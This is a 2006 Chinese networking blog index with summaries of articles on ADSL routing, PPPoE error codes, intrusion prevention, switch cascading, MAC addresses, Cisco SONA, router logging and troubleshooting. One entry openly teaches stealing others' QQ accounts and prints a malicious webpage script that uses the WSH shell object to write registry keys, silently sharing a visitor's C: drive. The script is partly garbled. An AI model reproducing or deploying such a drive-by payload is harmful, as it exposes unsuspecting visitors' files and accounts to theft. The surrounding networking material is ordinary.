博文
ADSL Modem之路由功能详述(2006-05-27 01:50:00)
摘要:目前,大多数ADSL Modem都支持多种网络协议,具有静态路由功能,可以视作完整的路由器。笔者经常遇到许多用 户在购买ADSL Modem时,指明Modem一定要带有路由功能,问其原因,回答往往是有路由功能的Modem性能要好些。实际上许多人对ADSL Modem路由功能的理解仅仅停留在概念上。那么,在小型网络中,带路由功能的ADSL Modem是如何与其他设备进行通信的呢?路由Modem对网络有什么具体的作用呢?我们怎样才能使用好ADSL Modem的路由功能呢?下面,笔者就分几期与大家讨论一下关于ADSL Modem路由功能方面的话题。
一、IP路由的概述
1. IP路由器定义 Internet是通过路由器互连的网络和主机的一个庞大集合,路由器是连接两个或两个以上包交换网络的专用计算机。在路由器工作时,它可以主动地为一个特定的目标设备接收数据,但接收到数据后跟着下一步会把数据传送到什么地方呢?当你给路由器定义了IP路由规则后,路由器会使用你提供的规则确定把数据传送到哪一个目标设备上。
2. IP路由器和电话交换机相比较 IP路由器的工作原理有点类似处理电话呼叫的接线交换机。当我们拨一个电话号码时,请求信号首先通过我们的本地电话线连接到一台正在工作的电话交换机上,所发出的所有呼叫最先到达这台主交换机;如果你所拨的电话号码是这台主交换机服务区域外的,那么这台交换机会为长途呼叫电话连接到更高一级的交换机,而这台更高一级的交换机会检查你拨的电话区号,并为你连接到所呼叫地区的电话交换机上;这台异地交换机会检查你拨的电话号码的前缀(其中的前三个数字),并连接到符合电话号码前缀的一台交换机上;到最后一台交换机上,它会检查电话号码的最后四位数字,并连接到你请求连接的目的地电话上。 相比之下,当你的计算机在因特网上开始与网络中的其他主机通讯时,例如要连接到一台网站服务器浏览网页,你的计算机发送出包括目标网页的计算机IP地址(如同“电话号码”)的数据包,所有你发出的请求首先到达与你计算机相连的ISP的路由器(如同“第一个电话交换机”)上,这时ISP的路由器会查看该数据包目标IP地址的网络ID部分(如同“电话区号”),并确定发送网页浏览请求的下一个路由器;经过......
adsl连通故障代码列表(2006-05-27 01:49:00)
摘要:首先检查是否正确安装了RasPPPoE 软件 Error 602 The port is already open问题:拨号网络网络由于设备安装错误或正在使用,不能进行连接原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装Error 605 Cannot set port information问题:拨号网络网络由于设备安装错误不能设定使用端口原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装 Error 606 The port is not connected问题:拨号网络网络不能连接所需的设备端口原因:RasPPPoE没有完全和正确的安装,连接线故障,ADSL MODEM故障解决:卸载干净任何PPPoE软件,重新安装,检查网线和 ADSL MODEM Error 608 The device does not exist问题:拨号网络网络连接的设备不存在原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装 Error 609 The device type does not exist问题:拨号网络网络连接的设备其种类不能确定原因:RasPPPoE没有完全和正确的安装解决:卸载干净任何PPPoE软件,重新安装 Error 611 The route is not available/612 The route is not allocated问题:拨号网络网络连接路由不正确原因:RasPPPoE没有完全和正确的安装,ISP服务器故障解决:卸载干净任何PPPoE软件,重新安装,致电ISP询问Error 617 The port or device is already disconnecting问题:拨号网络网络连接的设备已经断开原因:RasPPPoE没有完全和正确的安装,ISP服务器故障,连接线,ADSL MODEM故障解决:卸载干净任何PPPoE软件,重新安装,致电ISP询问 ,检查网线和 ADSL MODEMError 619问题:与ISP服务器不能建立连接原因:ADSL ISP 服务器故障,ADSL电话线故障解决:检查ADSL信号灯是否能正确同步。致电ISP询问 Error 621 Cannot open the phone book fileError ......
入侵防护系统(IPS)初探(2006-05-27 01:48:00)
摘要:随着网络入侵事件的不断增加和黑客攻击水平的不断提高,一方面企业网络感染病毒、遭受攻击的速度日益加快,另一方面企业网络受到攻击作出响应的时间却越来越滞后。解决这一矛盾,传统的防火墙或入侵检测技术(IDS)显得力不从心,这就需要引入一种全新的技术-入侵防护(Intrusion Prevention System,IPS)。 IPS的原理 防火墙是实施访问控制策略的系统,对流经的网络流量进行检查,拦截不符合安全策略的数据包。入侵检测技术(IDS)通过监视网络或系统资源,寻找违反安全策略的行为或攻击迹象,并发出报警。传统的防火墙旨在拒绝那些明显可疑的网络流量,但仍然允许某些流量通过,因此防火墙对于很多入侵攻击仍然无计可施。绝大多数 IDS 系统都是被动的,而不是主动的。也就是说,在攻击实际发生之前,它们往往无法预先发出警报。而入侵防护系统 (IPS) 则倾向于提供主动防护,其设计宗旨是预先对入侵活动和攻击性网络流量进行拦截,避免其造成损失,而不是简单地在恶意流量传送时或传送后才发出警报。IPS 是通过直接嵌入到网络流量中实现这一功能的,即通过一个网络端口接收来自外部系统的流量,经过检查确认其中不包含异常活动或可疑内容后,再通过另外一个端口将它传送到内部系统中。这样一来,有问题的数据包,以及所有来自同一数据流的后续数据包,都能在 IPS 设备中被清除掉。(图1)
图1
IPS实现实时检查和阻止入侵的原理在于IPS拥有数目众多的过滤器,能够防止各种攻击。当新的攻击手段被发现之后,IPS就会创建一个新的过滤器。IPS数据包处理引擎是专业化定制的集成电路,可以深层检查数据包的内容。如果有攻击者利用Layer 2 (介质访问控制)至Layer 7(应用)的漏洞发起攻击,IPS能够从数据流中检查出这些攻击并加以阻止。传统的防火墙只能对Layer 3或Layer 4进行检查,不能检测应用层的内容。防火墙的包过滤技术不会针对每一字节进行检查,因而也就无法发现攻击活动,而IPS可以做到逐一字节地检查数据包。所有流经IPS的数据包都被分类,分类的依据是数据包中的报头信息,如源IP地址和目的IP地址、端口号和应用域。每种过滤器负责分析相对应的数据包。通过检查的数据包可以继续前进,包含恶意内容的数据包就会被丢弃,被怀疑的数据包需要接受进一步的检查。 针对不同的攻击行为,IP......
黑客通过网页窃取QQ方法(2006-05-27 01:47:00)
摘要:想偷别人的QQ,方法有很多了。利用恶意网页使对方的电脑被共享出来是很有趣的一招。方法是:在你的网站网页中加入如下内容的代码:
<script language=Java Script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function f()
{*********************];
al.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
al.createlnstance()
Shl=al.GetObject() Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion
//Network//LanMan//RWC$//Flafgs",302,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan
//RWC$//Type",0,"REG_DWORD");
Shl.RegWrite("HKLM//Software//Microsoft//Windows//CurrentVersion//Network//LanMan
//RWC$//Path","C://");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>上面的代码大家一定很容易读懂,简单说来就是通过修改对方注册表中的键值,把对方的C盘共享出来,如果想让对方的其他盘都共享请自行设置。 上述代码中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外壳对象。WSH是微软提供的一种基于32位Windows平台的、与语言无关的脚本解释机制,它使得脚本能够直接在Windows桌面或命令提示符下运行。WSH使得脚本可以被执行,就象执行批处......
交换机的堆叠与级联基础(2006-05-27 01:46:00)
摘要:双绞线端口的级联 级联既可使用普通端口也可使用特殊的MDI-II端口。当相互级联的两个端口分别为普通端口(即MDI-X)端口和MDI-II端口时,应当使用直通电缆。当相互级联的两个端口均为普通端口(即MDI-X)或均为MDI-II端口时,则应当使用交叉电缆。 无论是10Base-T以太网、100Base-TX快速以太网还是1000Base-T千兆以太网,级联交换机所使用的电缆长度均可达到100米,这个长度与交换机到计算机之间长度完全相同。因此,级联除了能够扩充端口数量外,另外一个用途就是快速延伸网络直径。当有4台交换机级联时,网络跨度就可以达到500米。这样的距离对于位于同一座建筑物内的小型网络而言已经足够了! 1. 使用Uplink端口级联 现在,越来越多交换机(Cisco交换机除外)提供了Uplink端口(如图1所示),使得交换机之间的连接变得更加简单。
图1 Uplink端口 Uplink端口是专门用于与其他交换机连接的端口,可利用直通跳线将该端口连接至其他交换机的除Uplink端口外的任意端口(如图2所示),这种连接方式跟计算机与交换机之间的连接完全相同。需要注意的是,有些品牌的交换机(如3Com)使用一个普通端口兼作Uplink端口,并利用一个开关(MDI/MDI-X转换开关)在两种类型间进行切换。
图2 利用直通线通过Uplink端口级联交换机
2. 使用普通端口级联 如果交换机没有提供专门的级联端口(Uplink端口),那么,将只能使用交叉跳线,将两台交换机的普通端口连接在一起,扩展网络端口数量(如图3所示)。需要注意的是,当使用普通端口连接交换机时,必须使用交叉线而不是直通线。
图3 利用交叉线通过普通端口级联交换机 光纤端口的级联 由于光纤端口的价格仍然非常昂贵,所以,光纤主要被用于核心交换机和骨干交换机之间连接,或被用于骨干交换机之间的级联。需要注意的是,光纤端口均没有堆叠的能力,只能被用于级联。 1. 光纤跳线的交叉连接 所有交换机的光纤端口都是2个,分别是一发一收。当然,光纤跳线也必须是2根,否则端口之间将无法进行通讯。当交换机通过光纤端口级联时,必须将光纤跳线两端的收发对调,当一端接“收”时,另一端接“发”。同理,当一端接“发”时,另一端接“收”(如图4所示)。令人欣慰的是,Cis......
MAC地址的原理分析以及相关应用介绍(2006-05-27 01:44:00)
摘要:家都知道在现实的生活中,我们每个人都有属于自己的一个ID号--身份证号码,你可以去派出所把你的姓名改了,但是你的身份证号却不能随着你自己的姓名更改而更改。在网络世界中,我们常常可以听到IP地址的概念,不过MAC地址这个专业术语却很少被人提起,我们往往只知道IP地址,而MAC地址则是幕后英雄。正如我们在日常交流的时候,常常叫别人的姓名而不会去称呼别人的身份证号道理是一样的。
IP地址与MAC地址<
/P>
在日常的计算机使用过程中,大家都知道IP地址只要规划合理,你可以任意更改IP地址。修改的方法也是比较简单的,只要在对应网卡的TCP/IP协议上双击一下然后修改参数就行了。那么MAC地址与IP地址同为地址,它们之间有什么地方相似又有什么地方不同呢?下面就让我们一起来看看吧,了解它们的差异与类似之处便于我们更好的掌握。在OSI(Open System Interconnection,开放系统互连)7层网络协议参考模型中,第二层为数据链路层(Data Link)。MAC地址也叫物理地址、硬件地址或链路地址,由网络设备制造商生产时写在硬件内部。IP地址与MAC地址在计算机里都是以二进制表示的,IP地址是32位的,而MAC地址则是48位的。MAC地址的长度为48位(6个字节),通常表示为12个16进制数,每2个16进制数之间用冒号隔开,如:08:00:20:0A:8C:6D就是一个MAC地址,其中前6位16进制数08:00:20代表网络硬件制造商的编号,它由IEEE(电气与电子工程师协会)分配,而后3位16进制数0A:8C:6D代表该制造商所制造的某个网络产品(如网卡)的系列号。只要你不去更改自己的MAC地址,那么你的MAC地址在世界是惟一的。
MAC地址的作用
IP地址就如同一个职位,而MAC地址则好像是去应聘这个职位的人才,职位可以既可以让甲坐,也可以让乙坐,同样的道理一个节点的IP地址对于网卡是不做要求,基本上什么样的厂家都可以用,也就是说IP地址与MAC地址并不存在着绑定关系。本身有的计算机流动性就比较强,正如同人才可以给不同的单位干活的道理一样的,人才的流动性是比较强的。职位和人才的对应关系就有点像是IP地址与MAC地址的对应关系。比如,如果一个网卡坏了,可以被更换,而无须取得一个新的IP地址。如果一个IP主机从一个网......
什么是Cisco-SONA(2006-05-27 01:43:00)
摘要:速览
了解思科服务导向网络架构 (SONA)
企业面临的挑战
尽管投入大量 IT 资金,但许多企业发现大多数的关键网络资源和信息资产仍处于游离状态。事实上,拥有数百个无法彼此通信的“孤立”应用和数据库是常见的企业现象。
这部分是由于内外部客户不断增长却无法预测的需求所致。许多企业都被迫迅速部署新技术,常
导致部署多个分立系统,进而无法在机构内有效地共享信息。例如,如果不创建将应用和信息结合在一起的各种重叠网络,销售人员、客户服务人员或采购部门将无法轻松访问客户记录。许多企业都发现,这种盲目扩展为他们带来了多个未得到充分利用的、无法协调的 分离 系统和资源。这些 分离 的系统同时还难以管理且管理成本高昂。
智能信息网络 -- 思科优势
思科系统公司®凭借智能信息网络 (IIN) 计划,正在帮助全球 IT 机构解决这些问题并迎接新挑战,如部署服务导向的架构、 Web 服务和虚拟化等。 IIN 详细阐述了网络在促进软硬件集成方面的发展,这将使机构能够更好地根据业务优先级来调整 IT 资源。通过将智能构建于现有网络基础设施之中,IIN 将帮助机构实现降低基础设施复杂性和成本等优势。
网络的力量
IT 环境的创新主要集中在通过 传统的基于服务器的 系统来 分发 新业务应用。然而,网络仍然是透明连接并支持 IT 基础 架构 的所有组件的平台。使用思科®服务导向网络架构 (SONA) ,企业可优化应用、流程和资源,来获得更大的商业利益 。通过提供更出色的网络功能和智能,企业可提高与网络相关的各种活动的效率,同时 将更多的 资金用于全新的战略投资和创新。
标准化降低了支持相同数量的资产所需的运营成本,进而提高了资产效率。虚拟化优化了资产的使用,可从逻辑上分割物理资源,以便在所有的分散部门中使用。整个网络效率的全面提高能够增强灵活性及可扩展性,进而对业务发展、客户忠诚度及利润产生巨大影响 -- 从而提高企业的竞争优势。
利用架构取得成功
Cisco SONA 架构阐述了企业应如何发展到智能信息网络,以便加速应用、业务流程和资源使用、并使 IT 能够为企业提供更好服务。
Cisco SONA 利用思科及思科合作伙伴在各行业的解决方案、服务和经验来提供公认的、可扩展的商业解决方案。
Cisco SONA 架构阐述了如......
路由器的日志功能详细介绍(2006-05-27 01:42:00)
摘要:路由器的一些重要信息可以通过syslog机制在内部网络的UNIX主机上作日志。日志功能可通过在路由器上设定日志主机的IP地址,并在相应的UNIX主机上作一些必要的设置来实现
在路由器运行过程中路由器会向日志主机发送日志。日志包括链路建立失败信息包过滤日志信息等等。通过登录到日志主机,系统管理员可以了解日志事件,对日志进行分析。日志可以帮助管理员进行故障定位、故障排除,还可以帮助管理员对网络安全进行管理。[
1、在路由器上的配置表3-19 设置日志主机show loghost 查看日志主机no loghost 取消日志主机'loghost loghost-ip-address 设置日志主机例:使路由器向IP地址为202.38.160.1的UNIX工作站发送日志信息Quidway(config)#loghost 202.38.160.1
2、在UNIX主机上的配置下面的配置示例是在SunOS 4.0上完成的在其它厂商的UNIX操作系统上的配置操作基本与之相同。第一步、以超级用户(root)的身份执行以下命令#mkdir /var/log/Quidway#touch /var/log/Quidway/config#touch /var/log/Quidway/securityR|w:/第二步、以超级用户(root) 的身份编辑文件/etc/syslog.conf,加入以下选择/动作组合(selector/action pairs)。%x# Quidway configuration messages/local4.crit /var/log/Quidway/config# Quidway security messageslocal5.notice /var/log/Quidway/security注在编辑/etc/syslog.conf时应注意以下问题! 注释只允许独立成行并以字符#开头。! 选择/动作组合之间必须以一个制表符分隔而不能输入空格。! 在文件名之后不得有多余的空格。第三步、当日志文件config和security建立且/etc/s......
基于路由器诊断步骤和故障排除技巧(2006-05-27 01:41:00)
摘要:网络诊断是管好、用好网络,使网络发挥最大作用的重要技术工作。本文简述分层诊断技术,结合讨论路由器各种接口的诊断,综述互联网络连通性故障的排除。 网络故障诊断概述
网络故障诊断,从故障现象出发,以网络诊断工具为手段获取诊断信息,确定网络故障点,查找问题的根源,排除故障,恢复网络正常运行。网络故障通常有以下几种可能:物理层中物理设备相互连接失败或者硬件及线路本身的问题;数据链路层的网络设备的接口配置 问题;网络层网络协议配置或操作错误;传输层的设备性能或通信拥塞问题;上三层或网络应用程序错误。诊断网络故障的过程应该沿着OSI七层模型从物理层开始向上进行。首先检查物理层,然后检查数据链路层,以此类推,设法确定通信失败的故障点,直到系统通信 正常为止。
网络诊断可以使用多种工具:路由器诊断命令,网络管理工具和包括局域网或广域网分析仪在内的其它故障诊断工具。查看路由表,是开始查找网络故障的好办法。ICMP的ping、trace命令和Cisco的show命令、debug命令是获取故障诊断有 用信息的网络工具。如何监视网络在正常条件下的运行细节和出现故障的情况,监视哪些内容呢?利用show interface命令可以非常容易地获得待检查的每个接口的信息。show buffer命令提供定期显示缓冲区大小、用途及使用状况。show proc命令和 show proc mem命令可用于跟踪处理器和内存的使用情况。可以定期收集这些数据,在故障出现时用于诊断参考。
故障诊断步骤
第一步,首先确定故障的具体现象,分析造成这种故障现象的原因的类型。例如,主机不响应客户请求服务。可能的故障原因是主机配置问题、接口卡故障或路由器配置命令丢失等。
第二步,收集需要的用于帮助隔离可能故障原因的信息。从网络管理系统、协议分析跟踪、路由器诊断命令的输出报告或软件说明书中收集有用的信息。
第三步,根据收集到的情况考虑可能的故障原因,排除某些故障原因。例如,根据某些资料可以排除硬件故障,把注意力放在软件原因上。
第四步,根据最后的可能故障原因,建立一个诊断计划。开始仅用一个最可能的故障原因进行诊断活动,这样可以容易恢复到故障的原始状态。如果一次同时考虑多个故障原因,试图返回故障原始状态就困难多了。
第五步,执行诊断计划,认真做好每一步测试和观察,每改变一个参数都要确认其结果。分析结果确定问题是......
七大安全技术,彻底改变你的办公网络(2006-05-27 01:41:00)
摘要:网络彻底改变了企业经营的模式,为企业带来了更有效的沟通模式,促成了与顾客和合作伙伴之间的紧密联系,创造了无限商机。但是日益复杂的互联网环境和网络应用,同时也为企业带来了一个安全挑战,那就是如何能够确保企业通讯与资讯的安全。架设防火墙(Firewall),就是在企业内部网络(Intranet)及因特网(Internet)之间架设一道可监控管理的安全防护屏障, 管制所有网络封包的进出, 允许或禁止网络上特定之数据存取行为。 中怡数宽VPN防火墙SAFEcon100产品结合多项安全技术,并透过最佳化的安全操作系统,检查所有通过的 IP 封包,藉由 IP 地址、Port、协议类型、封包传送方向等来控制网络信息封包传播,达成商用网络最佳的安全防护功能。其重要的技术包括: 网络专用核心系统(Matrix 3D Engine), 严格定义访问策略, 地址列表概念引入, 合理规划IM商用, 强大日志监控网络 VPN 特殊接入应用 VPN 分点智能互联支持400条VPN隧道 特色1:网络专用核心(DO2) 中怡数宽SAFEcon100 VPN防火墙使用独特开发的系统内核(Dwnet OS v2,简称DO2),并以创新的硬体架构为基础平台,整合领先的芯片技术,经过最佳化的设计,在执行各种安全防护行为的同时,也提升了网络系统效能,即可高速处理海量数据,又可打造网络的最佳安全保护。 特色2:严格定义访问策略 中怡数宽SAFEcon100 FW核心对从网络层到应用层的状态和上下文特征数据进行检视分析,并随时动态更新,多方位地辨识非法攻击,通过用户严格定义的访问策略,对所有网络连接行为进行限制, 遏止非法网络行为。 防护方法包括:
状态检测封包阻隔 自定义的防火墙策略 深度通讯协议分析 连接数量异常侦测
特色3:(地址列表)概念引入 构建商用网络安全架构,人为错误导致的安全漏洞,在网络攻击事件中比例高达40%,因此直观简明的网络配置,对防火墙尤为重要,中怡数宽SAFEcon100 VPN防火墙引入“地址列表对象”概念,采用熟悉的“列表名称”来定义通用网络规则,从而缩短网络配置时间、减少管理错误和提高设备的可扩展......